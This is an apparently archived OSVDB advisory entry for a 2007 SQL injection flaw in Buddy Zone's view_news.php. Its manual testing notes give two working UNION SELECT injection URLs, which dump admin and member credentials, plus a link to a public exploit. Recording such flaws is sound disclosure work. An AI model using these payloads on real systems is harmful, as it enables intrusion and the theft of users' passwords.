Buddy Zone view_news.php news_id Variable SQL Injection

2007-06-30T00:00:00
ID OSVDB:38960
Type osvdb
Reporter OSVDB
Modified 2007-06-30T00:00:00

Description

Manual Testing Notes

http://[target]/view_news.php?news_id=-1//UNION//ALL//SELECT//1,concat(admin_user,0x3a,admin_password),3,4,5,6//FROM//admin_users/

http://[target]/view_news.php?news_id=-1//UNION//ALL//SELECT//1,concat(member_email,0x3a,member_password),3,4,5,6//FROM//members/

References:

Related OSVDB ID: 38961
Related OSVDB ID: 38962
ISS X-Force ID: 35187
Generic Exploit URL: http://www.milw0rm.com/exploits/4128
CVE-2007-3526
Bugtraq ID: 24726